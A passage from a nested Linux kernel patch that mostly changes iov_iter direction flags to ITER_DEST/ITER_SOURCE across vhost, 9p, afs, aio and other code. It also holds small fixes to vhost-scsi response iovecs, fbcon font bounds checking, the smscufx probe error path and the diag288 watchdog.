+ 		       se_cmd->scsi_sense_length);
+ 
+-		iov_iter_init(&iov_iter, READ, &cmd->tvc_resp_iov,
++		iov_iter_init(&iov_iter, ITER_DEST, cmd->tvc_resp_iov,
+ 			      cmd->tvc_in_iovs, sizeof(v_rsp));
+ 		ret = copy_to_iter(&v_rsp, sizeof(v_rsp), &iov_iter);
+ 		if (likely(ret == sizeof(v_rsp))) {
+@@ -594,6 +594,7 @@ vhost_scsi_get_cmd(struct vhost_virtqueue *vq, struct vhost_scsi_tpg *tpg,
+ 	struct vhost_scsi_cmd *cmd;
+ 	struct vhost_scsi_nexus *tv_nexus;
+ 	struct scatterlist *sg, *prot_sg;
++	struct iovec *tvc_resp_iov;
+ 	struct page **pages;
+ 	int tag;
+ 
+@@ -613,6 +614,7 @@ vhost_scsi_get_cmd(struct vhost_virtqueue *vq, struct vhost_scsi_tpg *tpg,
+ 	sg = cmd->tvc_sgl;
+ 	prot_sg = cmd->tvc_prot_sgl;
+ 	pages = cmd->tvc_upages;
++	tvc_resp_iov = cmd->tvc_resp_iov;
+ 	memset(cmd, 0, sizeof(*cmd));
+ 	cmd->tvc_sgl = sg;
+ 	cmd->tvc_prot_sgl = prot_sg;
+@@ -625,6 +627,7 @@ vhost_scsi_get_cmd(struct vhost_virtqueue *vq, struct vhost_scsi_tpg *tpg,
+ 	cmd->tvc_data_direction = data_direction;
+ 	cmd->tvc_nexus = tv_nexus;
+ 	cmd->inflight = vhost_scsi_get_inflight(vq);
++	cmd->tvc_resp_iov = tvc_resp_iov;
+ 
+ 	memcpy(cmd->tvc_cdb, cdb, VHOST_SCSI_MAX_CDB_SIZE);
+ 
+@@ -864,7 +867,7 @@ vhost_scsi_get_desc(struct vhost_scsi *vs, struct vhost_virtqueue *vq,
+ 	 * point at the start of the outgoing WRITE payload, if
+ 	 * DMA_TO_DEVICE is set.
+ 	 */
+-	iov_iter_init(&vc->out_iter, WRITE, vq->iov, vc->out, vc->out_size);
++	iov_iter_init(&vc->out_iter, ITER_SOURCE, vq->iov, vc->out, vc->out_size);
+ 	ret = 0;
+ 
+ done:
+@@ -935,7 +938,7 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq)
+ 	struct iov_iter in_iter, prot_iter, data_iter;
+ 	u64 tag;
+ 	u32 exp_data_len, data_direction;
+-	int ret, prot_bytes, c = 0;
++	int ret, prot_bytes, i, c = 0;
+ 	u16 lun;
+ 	u8 task_attr;
+ 	bool t10_pi = vhost_has_feature(vq, VIRTIO_SCSI_F_T10_PI);
+@@ -1016,7 +1019,7 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq)
+ 			data_direction = DMA_FROM_DEVICE;
+ 			exp_data_len = vc.in_size - vc.rsp_size;
+ 
+-			iov_iter_init(&in_iter, READ, &vq->iov[vc.out], vc.in,
++			iov_iter_init(&in_iter, ITER_DEST, &vq->iov[vc.out], vc.in,
+ 				      vc.rsp_size + exp_data_len);
+ 			iov_iter_advance(&in_iter, vc.rsp_size);
+ 			data_iter = in_iter;
+@@ -1092,7 +1095,8 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq)
+ 		}
+ 		cmd->tvc_vhost = vs;
+ 		cmd->tvc_vq = vq;
+-		cmd->tvc_resp_iov = vq->iov[vc.out];
++		for (i = 0; i < vc.in ; i++)
++			cmd->tvc_resp_iov[i] = vq->iov[vc.out + i];
+ 		cmd->tvc_in_iovs = vc.in;
+ 
+ 		pr_debug("vhost_scsi got command opcode: %#02x, lun: %d\n",
+@@ -1146,7 +1150,7 @@ vhost_scsi_send_tmf_resp(struct vhost_scsi *vs, struct vhost_virtqueue *vq,
+ 	memset(&rsp, 0, sizeof(rsp));
+ 	rsp.response = tmf_resp_code;
+ 
+-	iov_iter_init(&iov_iter, READ, resp_iov, in_iovs, sizeof(rsp));
++	iov_iter_init(&iov_iter, ITER_DEST, resp_iov, in_iovs, sizeof(rsp));
+ 
+ 	ret = copy_to_iter(&rsp, sizeof(rsp), &iov_iter);
+ 	if (likely(ret == sizeof(rsp)))
+@@ -1238,7 +1242,7 @@ vhost_scsi_send_an_resp(struct vhost_scsi *vs,
+ 	memset(&rsp, 0, sizeof(rsp));	/* event_actual = 0 */
+ 	rsp.response = VIRTIO_SCSI_S_OK;
+ 
+-	iov_iter_init(&iov_iter, READ, &vq->iov[vc->out], vc->in, sizeof(rsp));
++	iov_iter_init(&iov_iter, ITER_DEST, &vq->iov[vc->out], vc->in, sizeof(rsp));
+ 
+ 	ret = copy_to_iter(&rsp, sizeof(rsp), &iov_iter);
+ 	if (likely(ret == sizeof(rsp)))
+@@ -1461,6 +1465,7 @@ static void vhost_scsi_destroy_vq_cmds(struct vhost_virtqueue *vq)
+ 		kfree(tv_cmd->tvc_sgl);
+ 		kfree(tv_cmd->tvc_prot_sgl);
+ 		kfree(tv_cmd->tvc_upages);
++		kfree(tv_cmd->tvc_resp_iov);
+ 	}
+ 
+ 	sbitmap_free(&svq->scsi_tags);
+@@ -1508,6 +1513,14 @@ static int vhost_scsi_setup_vq_cmds(struct vhost_virtqueue *vq, int max_cmds)
+ 			goto out;
+ 		}
+ 
++		tv_cmd->tvc_resp_iov = kcalloc(UIO_MAXIOV,
++					       sizeof(struct iovec),
++					       GFP_KERNEL);
++		if (!tv_cmd->tvc_resp_iov) {
++			pr_err("Unable to allocate tv_cmd->tvc_resp_iov\n");
++			goto out;
++		}
++
+ 		tv_cmd->tvc_prot_sgl = kcalloc(VHOST_SCSI_PREALLOC_PROT_SGLS,
+ 					       sizeof(struct scatterlist),
+ 					       GFP_KERNEL);
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 3c2359570df9d..43c9770b86e5a 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -661,7 +661,7 @@ void vhost_dev_stop(struct vhost_dev *dev)
+ }
+ EXPORT_SYMBOL_GPL(vhost_dev_stop);
+ 
+-static void vhost_clear_msg(struct vhost_dev *dev)
++void vhost_clear_msg(struct vhost_dev *dev)
+ {
+ 	struct vhost_msg_node *node, *n;
+ 
+@@ -679,6 +679,7 @@ static void vhost_clear_msg(struct vhost_dev *dev)
+ 
+ 	spin_unlock(&dev->iotlb_lock);
+ }
++EXPORT_SYMBOL_GPL(vhost_clear_msg);
+ 
+ void vhost_dev_cleanup(struct vhost_dev *dev)
+ {
+@@ -832,7 +833,7 @@ static int vhost_copy_to_user(struct vhost_virtqueue *vq, void __user *to,
+ 				     VHOST_ACCESS_WO);
+ 		if (ret < 0)
+ 			goto out;
+-		iov_iter_init(&t, WRITE, vq->iotlb_iov, ret, size);
++		iov_iter_init(&t, ITER_DEST, vq->iotlb_iov, ret, size);
+ 		ret = copy_to_iter(from, size, &t);
+ 		if (ret == size)
+ 			ret = 0;
+@@ -871,7 +872,7 @@ static int vhost_copy_from_user(struct vhost_virtqueue *vq, void *to,
+ 			       (unsigned long long) size);
+ 			goto out;
+ 		}
+-		iov_iter_init(&f, READ, vq->iotlb_iov, ret, size);
++		iov_iter_init(&f, ITER_SOURCE, vq->iotlb_iov, ret, size);
+ 		ret = copy_from_iter(to, size, &f);
+ 		if (ret == size)
+ 			ret = 0;
+@@ -2135,7 +2136,7 @@ static int get_indirect(struct vhost_virtqueue *vq,
+ 			vq_err(vq, "Translation failure %d in indirect.\n", ret);
+ 		return ret;
+ 	}
+-	iov_iter_init(&from, READ, vq->indirect, ret, len);
++	iov_iter_init(&from, ITER_SOURCE, vq->indirect, ret, len);
+ 	count = len / sizeof desc;
+ 	/* Buffers are chained via a 16 bit next field, so
+ 	 * we can have at most 2^16 of these. */
+diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
+index d9109107af087..790b296271f1e 100644
+--- a/drivers/vhost/vhost.h
++++ b/drivers/vhost/vhost.h
+@@ -181,6 +181,7 @@ long vhost_dev_ioctl(struct vhost_dev *, unsigned int ioctl, void __user *argp);
+ long vhost_vring_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp);
+ bool vhost_vq_access_ok(struct vhost_virtqueue *vq);
+ bool vhost_log_access_ok(struct vhost_dev *);
++void vhost_clear_msg(struct vhost_dev *dev);
+ 
+ int vhost_get_vq_desc(struct vhost_virtqueue *,
+ 		      struct iovec iov[], unsigned int iov_count,
+diff --git a/drivers/vhost/vringh.c b/drivers/vhost/vringh.c
+index 828c293065657..33eb941fcf154 100644
+--- a/drivers/vhost/vringh.c
++++ b/drivers/vhost/vringh.c
+@@ -1161,7 +1161,7 @@ static inline int copy_from_iotlb(const struct vringh *vrh, void *dst,
+ 		else if (ret < 0)
+ 			return ret;
+ 
+-		iov_iter_bvec(&iter, READ, iov, ret, translated);
++		iov_iter_bvec(&iter, ITER_SOURCE, iov, ret, translated);
+ 
+ 		ret = copy_from_iter(dst, translated, &iter);
+ 		if (ret < 0)
+@@ -1194,7 +1194,7 @@ static inline int copy_to_iotlb(const struct vringh *vrh, void *dst,
+ 		else if (ret < 0)
+ 			return ret;
+ 
+-		iov_iter_bvec(&iter, WRITE, iov, ret, translated);
++		iov_iter_bvec(&iter, ITER_DEST, iov, ret, translated);
+ 
+ 		ret = copy_to_iter(src, translated, &iter);
+ 		if (ret < 0)
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index 10a7d23731fef..a2b3743723639 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -165,7 +165,7 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 			break;
+ 		}
+ 
+-		iov_iter_init(&iov_iter, READ, &vq->iov[out], in, iov_len);
++		iov_iter_init(&iov_iter, ITER_DEST, &vq->iov[out], in, iov_len);
+ 		payload_len = pkt->len - pkt->off;
+ 
+ 		/* If the packet is greater than the space available in the
+@@ -371,7 +371,7 @@ vhost_vsock_alloc_pkt(struct vhost_virtqueue *vq,
+ 		return NULL;
+ 
+ 	len = iov_length(vq->iov, out);
+-	iov_iter_init(&iov_iter, WRITE, vq->iov, out, len);
++	iov_iter_init(&iov_iter, ITER_SOURCE, vq->iov, out, len);
+ 
+ 	nbytes = copy_from_iter(&pkt->hdr, sizeof(pkt->hdr), &iov_iter);
+ 	if (nbytes != sizeof(pkt->hdr)) {
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 14a7d404062c3..1b14c21af2b74 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -2495,9 +2495,12 @@ static int fbcon_set_font(struct vc_data *vc, struct console_font *font,
+ 	    h > FBCON_SWAP(info->var.rotate, info->var.yres, info->var.xres))
+ 		return -EINVAL;
+ 
++	if (font->width > 32 || font->height > 32)
++		return -EINVAL;
++
+ 	/* Make sure drawing engine can handle the font */
+-	if (!(info->pixmap.blit_x & (1 << (font->width - 1))) ||
+-	    !(info->pixmap.blit_y & (1 << (font->height - 1))))
++	if (!(info->pixmap.blit_x & BIT(font->width - 1)) ||
++	    !(info->pixmap.blit_y & BIT(font->height - 1)))
+ 		return -EINVAL;
+ 
+ 	/* Make sure driver can handle the font length */
+diff --git a/drivers/video/fbdev/smscufx.c b/drivers/video/fbdev/smscufx.c
+index 9343b7a4ac899..2ad6e98ce10d5 100644
+--- a/drivers/video/fbdev/smscufx.c
++++ b/drivers/video/fbdev/smscufx.c
+@@ -1622,7 +1622,7 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 	struct usb_device *usbdev;
+ 	struct ufx_data *dev;
+ 	struct fb_info *info;
+-	int retval;
++	int retval = -ENOMEM;
+ 	u32 id_rev, fpga_rev;
+ 
+ 	/* usb initialization */
+@@ -1654,15 +1654,17 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 
+ 	if (!ufx_alloc_urb_list(dev, WRITES_IN_FLIGHT, MAX_TRANSFER)) {
+ 		dev_err(dev->gdev, "ufx_alloc_urb_list failed\n");
+-		goto e_nomem;
++		goto put_ref;
+ 	}
+ 
+ 	/* We don't register a new USB class. Our client interface is fbdev */
+ 
+ 	/* allocates framebuffer driver structure, not framebuffer memory */
+ 	info = framebuffer_alloc(0, &usbdev->dev);
+-	if (!info)
+-		goto e_nomem;
++	if (!info) {
++		dev_err(dev->gdev, "framebuffer_alloc failed\n");
++		goto free_urb_list;
++	}
+ 
+ 	dev->info = info;
+ 	info->par = dev;
+@@ -1705,22 +1707,34 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 	check_warn_goto_error(retval, "unable to find common mode for display and adapter");
+ 
+ 	retval = ufx_reg_set_bits(dev, 0x4000, 0x00000001);
+-	check_warn_goto_error(retval, "error %d enabling graphics engine", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d enabling graphics engine", retval);
++		goto setup_modes;
++	}
+ 
+ 	/* ready to begin using device */
+ 	atomic_set(&dev->usb_active, 1);
+ 
+ 	dev_dbg(dev->gdev, "checking var");
+ 	retval = ufx_ops_check_var(&info->var, info);
+-	check_warn_goto_error(retval, "error %d ufx_ops_check_var", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d ufx_ops_check_var", retval);
++		goto reset_active;
++	}
+ 
+ 	dev_dbg(dev->gdev, "setting par");
+ 	retval = ufx_ops_set_par(info);
+-	check_warn_goto_error(retval, "error %d ufx_ops_set_par", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d ufx_ops_set_par", retval);
++		goto reset_active;
++	}
+ 
+ 	dev_dbg(dev->gdev, "registering framebuffer");
+ 	retval = register_framebuffer(info);
+-	check_warn_goto_error(retval, "error %d register_framebuffer", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d register_framebuffer", retval);
++		goto reset_active;
++	}
+ 
+ 	dev_info(dev->gdev, "SMSC UDX USB device /dev/fb%d attached. %dx%d resolution."
+ 		" Using %dK framebuffer memory\n", info->node,
+@@ -1728,21 +1742,23 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 
+ 	return 0;
+ 
+-error:
+-	fb_dealloc_cmap(&info->cmap);
+-destroy_modedb:
++reset_active:
++	atomic_set(&dev->usb_active, 0);
++setup_modes:
+ 	fb_destroy_modedb(info->monspecs.modedb);
+ 	vfree(info->screen_base);
+ 	fb_destroy_modelist(&info->modelist);
++error:
++	fb_dealloc_cmap(&info->cmap);
++destroy_modedb:
+ 	framebuffer_release(info);
++free_urb_list:
++	if (dev->urbs.count > 0)
++		ufx_free_urb_list(dev);
+ put_ref:
+ 	kref_put(&dev->kref, ufx_free); /* ref for framebuffer */
+ 	kref_put(&dev->kref, ufx_free); /* last ref from kref_init */
+ 	return retval;
+-
+-e_nomem:
+-	retval = -ENOMEM;
+-	goto put_ref;
+ }
+ 
+ static void ufx_usb_disconnect(struct usb_interface *interface)
+diff --git a/drivers/watchdog/diag288_wdt.c b/drivers/watchdog/diag288_wdt.c
+index 4cb10877017c7..6ca5d9515d85c 100644
+--- a/drivers/watchdog/diag288_wdt.c
++++ b/drivers/watchdog/diag288_wdt.c
+@@ -86,7 +86,7 @@ static int __diag288(unsigned int func, unsigned int timeout,
+ 		"1:\n"
+ 		EX_TABLE(0b, 1b)
+ 		: "+d" (err) : "d"(__func), "d"(__timeout),
+-		  "d"(__action), "d"(__len) : "1", "cc");
++		  "d"(__action), "d"(__len) : "1", "cc", "memory");
+ 	return err;
+ }
+ 
+@@ -268,12 +268,21 @@ static int __init diag288_init(void)
+ 	char ebc_begin[] = {
+ 		194, 197, 199, 201, 213
+ 	};
++	char *ebc_cmd;
+ 
+ 	watchdog_set_nowayout(&wdt_dev, nowayout_info);
+ 
+ 	if (MACHINE_IS_VM) {
+-		if (__diag288_vm(WDT_FUNC_INIT, 15,
+-				 ebc_begin, sizeof(ebc_begin)) != 0) {
++		ebc_cmd = kmalloc(sizeof(ebc_begin), GFP_KERNEL);
++		if (!ebc_cmd) {
++			pr_err("The watchdog cannot be initialized\n");
++			return -ENOMEM;
++		}
++		memcpy(ebc_cmd, ebc_begin, sizeof(ebc_begin));
++		ret = __diag288_vm(WDT_FUNC_INIT, 15,
++				   ebc_cmd, sizeof(ebc_begin));
++		kfree(ebc_cmd);
++		if (ret != 0) {
+ 			pr_err("The watchdog cannot be initialized\n");
+ 			return -EINVAL;
+ 		}
+diff --git a/drivers/xen/pvcalls-back.c b/drivers/xen/pvcalls-back.c
+index d6f945fd41474..28b2a1fa25ab5 100644
+--- a/drivers/xen/pvcalls-back.c
++++ b/drivers/xen/pvcalls-back.c
+@@ -129,13 +129,13 @@ static bool pvcalls_conn_back_read(void *opaque)
+ 	if (masked_prod < masked_cons) {
+ 		vec[0].iov_base = data->in + masked_prod;
+ 		vec[0].iov_len = wanted;
+-		iov_iter_kvec(&msg.msg_iter, WRITE, vec, 1, wanted);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, vec, 1, wanted);
+ 	} else {
+ 		vec[0].iov_base = data->in + masked_prod;
+ 		vec[0].iov_len = array_size - masked_prod;
+ 		vec[1].iov_base = data->in;
+ 		vec[1].iov_len = wanted - vec[0].iov_len;
+-		iov_iter_kvec(&msg.msg_iter, WRITE, vec, 2, wanted);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, vec, 2, wanted);
+ 	}
+ 
+ 	atomic_set(&map->read, 0);
+@@ -188,13 +188,13 @@ static bool pvcalls_conn_back_write(struct sock_mapping *map)
+ 	if (pvcalls_mask(prod, array_size) > pvcalls_mask(cons, array_size)) {
+ 		vec[0].iov_base = data->out + pvcalls_mask(cons, array_size);
+ 		vec[0].iov_len = size;
+-		iov_iter_kvec(&msg.msg_iter, READ, vec, 1, size);
++		iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, vec, 1, size);
+ 	} else {
+ 		vec[0].iov_base = data->out + pvcalls_mask(cons, array_size);
+ 		vec[0].iov_len = array_size - pvcalls_mask(cons, array_size);
+ 		vec[1].iov_base = data->out;
+ 		vec[1].iov_len = size - vec[0].iov_len;
+-		iov_iter_kvec(&msg.msg_iter, READ, vec, 2, size);
++		iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, vec, 2, size);
+ 	}
+ 
+ 	atomic_set(&map->write, 0);
+diff --git a/fs/9p/vfs_addr.c b/fs/9p/vfs_addr.c
+index 47b9a1122f344..a19891015f196 100644
+--- a/fs/9p/vfs_addr.c
++++ b/fs/9p/vfs_addr.c
+@@ -40,7 +40,7 @@ static void v9fs_issue_read(struct netfs_io_subrequest *subreq)
+ 	size_t len = subreq->len   - subreq->transferred;
+ 	int total, err;
+ 
+-	iov_iter_xarray(&to, READ, &rreq->mapping->i_pages, pos, len);
++	iov_iter_xarray(&to, ITER_DEST, &rreq->mapping->i_pages, pos, len);
+ 
+ 	total = p9_client_read(fid, pos, &to, &err);
+ 
+@@ -172,7 +172,7 @@ static int v9fs_vfs_write_folio_locked(struct folio *folio)
+ 
+ 	len = min_t(loff_t, i_size - start, len);
+ 
+-	iov_iter_xarray(&from, WRITE, &folio_mapping(folio)->i_pages, start, len);
++	iov_iter_xarray(&from, ITER_SOURCE, &folio_mapping(folio)->i_pages, start, len);
+ 
+ 	/* We should have writeback_fid always set */
+ 	BUG_ON(!v9inode->writeback_fid);
+diff --git a/fs/9p/vfs_dir.c b/fs/9p/vfs_dir.c
+index 000fbaae9b180..3bb95adc9619d 100644
+--- a/fs/9p/vfs_dir.c
++++ b/fs/9p/vfs_dir.c
+@@ -109,7 +109,7 @@ static int v9fs_dir_readdir(struct file *file, struct dir_context *ctx)
+ 			struct iov_iter to;
+ 			int n;
+ 
+-			iov_iter_kvec(&to, READ, &kvec, 1, buflen);
++			iov_iter_kvec(&to, ITER_DEST, &kvec, 1, buflen);
+ 			n = p9_client_read(file->private_data, ctx->pos, &to,
+ 					   &err);
+ 			if (err)
+diff --git a/fs/9p/xattr.c b/fs/9p/xattr.c
+index 1f9298a4bd428..2807bb63f7802 100644
+--- a/fs/9p/xattr.c
++++ b/fs/9p/xattr.c
+@@ -24,7 +24,7 @@ ssize_t v9fs_fid_xattr_get(struct p9_fid *fid, const char *name,
+ 	struct iov_iter to;
+ 	int err;
+ 
+-	iov_iter_kvec(&to, READ, &kvec, 1, buffer_size);
++	iov_iter_kvec(&to, ITER_DEST, &kvec, 1, buffer_size);
+ 
+ 	attr_fid = p9_client_xattrwalk(fid, name, &attr_size);
+ 	if (IS_ERR(attr_fid)) {
+@@ -109,7 +109,7 @@ int v9fs_fid_xattr_set(struct p9_fid *fid, const char *name,
+ 	struct iov_iter from;
+ 	int retval, err;
+ 
+-	iov_iter_kvec(&from, WRITE, &kvec, 1, value_len);
++	iov_iter_kvec(&from, ITER_SOURCE, &kvec, 1, value_len);
+ 
+ 	p9_debug(P9_DEBUG_VFS, "name = %s value_len = %zu flags = %d\n",
+ 		 name, value_len, flags);
+diff --git a/fs/afs/cmservice.c b/fs/afs/cmservice.c
+index 0a090d614e762..7dcd59693a0c2 100644
+--- a/fs/afs/cmservice.c
++++ b/fs/afs/cmservice.c
+@@ -298,7 +298,7 @@ static int afs_deliver_cb_callback(struct afs_call *call)
+ 		if (call->count2 != call->count && call->count2 != 0)
+ 			return afs_protocol_error(call, afs_eproto_cb_count);
+ 		call->iter = &call->def_iter;
+-		iov_iter_discard(&call->def_iter, READ, call->count2 * 3 * 4);
++		iov_iter_discard(&call->def_iter, ITER_DEST, call->count2 * 3 * 4);
+ 		call->unmarshall++;
+ 
+ 		fallthrough;
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 230c2d19116d9..104df2964225c 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -305,7 +305,7 @@ expand:
+ 	req->actual_len = i_size; /* May change */
+ 	req->len = nr_pages * PAGE_SIZE; /* We can ask for more than there is */
+ 	req->data_version = dvnode->status.data_version; /* May change */
+-	iov_iter_xarray(&req->def_iter, READ, &dvnode->netfs.inode.i_mapping->i_pages,
++	iov_iter_xarray(&req->def_iter, ITER_DEST, &dvnode->netfs.inode.i_mapping->i_pages,
+ 			0, i_size);
+ 	req->iter = &req->def_iter;
+ 
+diff --git a/fs/afs/file.c b/fs/afs/file.c
+index d1cfb235c4b9b..2eeab57df133a 100644
+--- a/fs/afs/file.c
++++ b/fs/afs/file.c
+@@ -324,7 +324,7 @@ static void afs_issue_read(struct netfs_io_subrequest *subreq)
+ 	fsreq->vnode	= vnode;
+ 	fsreq->iter	= &fsreq->def_iter;
+ 
+-	iov_iter_xarray(&fsreq->def_iter, READ,
++	iov_iter_xarray(&fsreq->def_iter, ITER_DEST,
+ 			&fsreq->vnode->netfs.inode.i_mapping->i_pages,
+ 			fsreq->pos, fsreq->len);
+ 
+@@ -346,7 +346,7 @@ static int afs_symlink_read_folio(struct file *file, struct folio *folio)
+ 	fsreq->len	= folio_size(folio);
+ 	fsreq->vnode	= vnode;
+ 	fsreq->iter	= &fsreq->def_iter;
+-	iov_iter_xarray(&fsreq->def_iter, READ, &folio->mapping->i_pages,
++	iov_iter_xarray(&fsreq->def_iter, ITER_DEST, &folio->mapping->i_pages,
+ 			fsreq->pos, fsreq->len);
+ 
+ 	ret = afs_fetch_data(fsreq->vnode, fsreq);
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index 723d162078a3c..9ba7b68375c9f 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -1301,7 +1301,7 @@ static inline void afs_extract_begin(struct afs_call *call, void *buf, size_t si
+ 	call->iov_len = size;
+ 	call->kvec[0].iov_base = buf;
+ 	call->kvec[0].iov_len = size;
+-	iov_iter_kvec(&call->def_iter, READ, call->kvec, 1, size);
++	iov_iter_kvec(&call->def_iter, ITER_DEST, call->kvec, 1, size);
+ }
+ 
+ static inline void afs_extract_to_tmp(struct afs_call *call)
+@@ -1319,7 +1319,7 @@ static inline void afs_extract_to_tmp64(struct afs_call *call)
+ static inline void afs_extract_discard(struct afs_call *call, size_t size)
+ {
+ 	call->iov_len = size;
+-	iov_iter_discard(&call->def_iter, READ, size);
++	iov_iter_discard(&call->def_iter, ITER_DEST, size);
+ }
+ 
+ static inline void afs_extract_to_buf(struct afs_call *call, size_t size)
+diff --git a/fs/afs/rxrpc.c b/fs/afs/rxrpc.c
+index eccc3cd0cb700..c62939e5ea1f0 100644
+--- a/fs/afs/rxrpc.c
++++ b/fs/afs/rxrpc.c
+@@ -359,7 +359,7 @@ void afs_make_call(struct afs_addr_cursor *ac, struct afs_call *call, gfp_t gfp)
+ 
+ 	msg.msg_name		= NULL;
+ 	msg.msg_namelen		= 0;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iov, 1, call->request_size);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iov, 1, call->request_size);
+ 	msg.msg_control		= NULL;
+ 	msg.msg_controllen	= 0;
+ 	msg.msg_flags		= MSG_WAITALL | (call->write_iter ? MSG_MORE : 0);
+@@ -400,7 +400,7 @@ error_do_abort:
+ 					RX_USER_ABORT, ret, "KSD");
+ 	} else {
+ 		len = 0;
+-		iov_iter_kvec(&msg.msg_iter, READ, NULL, 0, 0);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, NULL, 0, 0);
+ 		rxrpc_kernel_recv_data(call->net->socket, rxcall,
+ 				       &msg.msg_iter, &len, false,
+ 				       &call->abort_code, &call->service_id);
+@@ -485,7 +485,7 @@ static void afs_deliver_to_call(struct afs_call *call)
+ 	       ) {
+ 		if (state == AFS_CALL_SV_AWAIT_ACK) {
+ 			len = 0;
+-			iov_iter_kvec(&call->def_iter, READ, NULL, 0, 0);
++			iov_iter_kvec(&call->def_iter, ITER_DEST, NULL, 0, 0);
+ 			ret = rxrpc_kernel_recv_data(call->net->socket,
+ 						     call->rxcall, &call->def_iter,
+ 						     &len, false, &remote_abort,
+@@ -822,7 +822,7 @@ void afs_send_empty_reply(struct afs_call *call)
+ 
+ 	msg.msg_name		= NULL;
+ 	msg.msg_namelen		= 0;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, NULL, 0, 0);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 	msg.msg_control		= NULL;
+ 	msg.msg_controllen	= 0;
+ 	msg.msg_flags		= 0;
+@@ -862,7 +862,7 @@ void afs_send_simple_reply(struct afs_call *call, const void *buf, size_t len)
+ 	iov[0].iov_len		= len;
+ 	msg.msg_name		= NULL;
+ 	msg.msg_namelen		= 0;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iov, 1, len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iov, 1, len);
+ 	msg.msg_control		= NULL;
+ 	msg.msg_controllen	= 0;
+ 	msg.msg_flags		= 0;
+diff --git a/fs/afs/write.c b/fs/afs/write.c
+index 9ebdd36eaf2fc..08fd456dde67c 100644
+--- a/fs/afs/write.c
++++ b/fs/afs/write.c
+@@ -609,7 +609,7 @@ static ssize_t afs_write_back_from_locked_folio(struct address_space *mapping,
+ 		 */
+ 		afs_write_to_cache(vnode, start, len, i_size, caching);
+ 
+-		iov_iter_xarray(&iter, WRITE, &mapping->i_pages, start, len);
++		iov_iter_xarray(&iter, ITER_SOURCE, &mapping->i_pages, start, len);
+ 		ret = afs_store_data(vnode, &iter, start, false);
+ 	} else {
+ 		_debug("write discard %x @%llx [%llx]", len, start, i_size);
+@@ -1000,7 +1000,7 @@ int afs_launder_folio(struct folio *folio)
+ 		bv[0].bv_page = &folio->page;
+ 		bv[0].bv_offset = f;
+ 		bv[0].bv_len = t - f;
+-		iov_iter_bvec(&iter, WRITE, bv, 1, bv[0].bv_len);
++		iov_iter_bvec(&iter, ITER_SOURCE, bv, 1, bv[0].bv_len);
+ 
+ 		trace_afs_folio_dirty(vnode, tracepoint_string("launder"), folio);
+ 		ret = afs_store_data(vnode, &iter, folio_pos(folio) + f, true);
+diff --git a/fs/aio.c b/fs/aio.c
+index 5b2ff20ad3229..562916d85cba8 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -1552,7 +1552,7 @@ static int aio_read(struct kiocb *req, const struct iocb *iocb,
+ 	if (unlikely(!file->f_op->read_iter))
+ 		return -EINVAL;
+ 
+-	ret = aio_setup_rw(READ, iocb, &iovec, vectored, compat, &iter);
++	ret = aio_setup_rw(ITER_DEST, iocb, &iovec, vectored, compat, &iter);
+ 	if (ret < 0)
+ 		return ret;
+ 	ret = rw_verify_area(READ, file, &req->ki_pos, iov_iter_count(&iter));
+@@ -1580,7 +1580,7 @@ static int aio_write(struct kiocb *req, const struct iocb *iocb,
+ 	if (unlikely(!file->f_op->write_iter))
+ 		return -EINVAL;
+ 
+-	ret = aio_setup_rw(WRITE, iocb, &iovec, vectored, compat, &iter);
++	ret = aio_setup_rw(ITER_SOURCE, iocb, &iovec, vectored, compat, &iter);
+ 	if (ret < 0)
+ 		return ret;
+ 	ret = rw_verify_area(WRITE, file, &req->ki_pos, iov_iter_count(&iter));
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index fd1902573cde3..c05f16a35bcaf 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -5283,7 +5283,7 @@ static int btrfs_ioctl_encoded_read(struct file *file, void __user *argp,
+ 		goto out_acct;
+ 	}
+ 
+-	ret = import_iovec(READ, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
++	ret = import_iovec(ITER_DEST, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
+ 			   &iov, &iter);
+ 	if (ret < 0)
+ 		goto out_acct;
+@@ -5382,7 +5382,7 @@ static int btrfs_ioctl_encoded_write(struct file *file, void __user *argp, bool
